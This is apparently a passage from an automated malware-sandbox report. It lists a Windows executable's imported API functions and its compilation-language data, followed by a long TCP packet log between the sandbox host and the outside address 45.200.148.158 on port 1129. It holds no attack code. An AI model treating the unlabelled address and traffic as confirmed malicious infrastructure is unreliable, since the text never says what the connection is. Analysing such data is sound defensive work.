                gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMetaRgn, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MultiByteToWideChar, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringA, CompareStringW, CloseHandle
                advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                kernel32.dllSleep
                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                oleaut32.dllGetErrorInfo, SysStringLen, SysFreeString
                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoCreateInstance, CoGetMalloc, CoUninitialize, CoInitialize, IsEqualGUID
                comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                shell32.dllShell_NotifyIconW
                shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW
                winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                winspool.drvGetDefaultPrinterW
                winhttp.dllWinHttpWriteData, WinHttpSetOption, WinHttpSetCredentials, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpReadData, WinHttpQueryOption, WinHttpQueryHeaders, WinHttpQueryDataAvailable, WinHttpQueryAuthSchemes, WinHttpOpenRequest, WinHttpOpen, WinHttpCrackUrl, WinHttpConnect, WinHttpCloseHandle, WinHttpAddRequestHeaders
                NameOrdinalAddress
                TMethodImplementationIntercept30x49ec60
                __dbk_fcall_wrapper20x416c50
                dbkFCallWrapperAddr10xb36f58
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                ChineseChina
                TimestampSource PortDest PortSource IPDest IP
                Jan 1, 2025 18:09:55.461775064 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:55.466660023 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:55.466728926 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:55.467158079 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:55.471923113 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:56.073965073 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:56.120426893 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:57.944812059 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:57.949661016 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:57.949712038 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:57.954441071 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.274868965 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.323635101 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.403930902 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.405615091 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.410389900 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.410459042 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.415262938 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.701138973 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.745397091 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.830204010 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.830373049 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.835133076 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.835181952 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.839935064 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.842053890 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.846791983 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.846831083 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.851553917 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.964481115 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.969284058 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:58.969355106 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:58.974158049 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.247256994 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.247776985 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.247859955 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.248775005 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.248786926 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.248850107 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.250211000 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.250221968 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.250264883 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.252496958 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.252509117 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.252578020 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.254884958 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.254898071 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.254915953 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.254935980 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.307909966 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.328381062 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.328893900 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.328942060 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.333816051 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.334729910 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.334781885 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.334964037 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.336031914 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.336081982 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.339473009 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.339484930 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.339499950 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.339519978 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.340795994 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.340807915 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.340848923 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.344242096 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.344254017 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.344273090 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.344280958 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.344316959 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.345508099 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.345520020 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.345560074 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.348994017 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.349006891 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.349026918 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.349080086 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.350454092 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.350466013 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.350498915 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.353682995 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.353694916 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.353730917 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.355220079 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.355237961 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.355247021 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.355288982 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.420501947 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.421040058 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.421051979 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.421084881 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.422451019 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.422497988 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.425730944 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.425745964 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.425796986 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.427251101 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.427267075 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.427277088 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.427320004 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.430428982 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.430445910 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.430459023 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.430473089 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.430499077 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.431981087 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.432001114 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.432050943 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.435132980 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.435151100 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.435163975 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.435201883 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.436681032 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.436697006 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.436733961 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.439809084 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.439821005 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.439855099 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.441457987 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.441473961 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.441509008 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.444498062 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.444514036 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.444550037 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.446157932 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.446173906 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.446190119 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.446211100 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.446227074 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.449192047 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.449203968 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.449246883 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.450870037 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.450885057 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.450942993 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.453907967 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.453919888 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.453975916 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.455569983 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.455590963 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.455604076 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.455625057 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.457339048 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.457350969 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.457380056 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.459618092 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.459630013 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.459675074 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.461906910 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.461919069 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.461955070 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.464143991 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.464159012 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.464173079 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.464190006 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.464222908 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.514084101 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.514569044 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.514622927 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.514699936 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.515712023 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.515731096 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.515749931 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.517761946 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.517776966 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.517805099 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.549822092 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.554588079 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.554626942 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.559350014 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.593765020 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.598556042 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.598613024 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.603410006 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.714540005 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.719400883 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:09:59.719459057 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:09:59.724272013 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.109608889 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.111733913 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.111948967 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.112227917 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.112237930 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.112274885 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.113353968 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.114300013 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.114310026 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.114355087 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.115470886 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.115484953 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.115495920 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.115521908 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.115551949 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.117522955 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.117537022 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.117554903 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.117588043 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.119612932 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.119626999 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.119642973 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.119667053 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.119685888 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.121300936 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.121315002 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.121337891 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.121365070 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.122977018 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.122988939 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.123004913 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.123049974 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.123074055 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.124556065 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.124574900 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.124591112 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.124783039 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.126216888 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.126229048 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.126247883 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.126275063 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.126290083 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.127882957 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.127897024 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.127909899 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.127947092 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.129196882 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.129390001 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.193188906 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.193562984 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.193578005 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.193743944 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.195054054 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.195065975 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.195126057 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.196708918 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.196722031 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.196738958 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.196767092 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.196799040 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.198437929 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.198452950 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.198538065 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.200099945 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.200112104 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.200129986 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.200171947 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.201742887 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.201761007 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.201775074 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.201805115 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.201857090 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.203084946 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.203099966 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.203110933 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.203145981 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.204349995 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.204361916 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.204391003 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.205656052 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.205667973 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.205682993 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.205707073 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.205741882 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.206985950 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.206998110 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.207043886 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.208302975 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.208316088 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.208332062 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.208379984 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.209625006 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.209649086 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.209657907 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.209696054 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.210941076 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.210953951 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.210969925 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.211011887 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.212259054 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.212270975 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.212285995 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.212306976 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.212336063 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.213473082 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.213489056 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.213496923 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.213527918 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:00.214698076 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.214709997 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:00.214726925 CET11294973045.200.148.158192.168.2.4
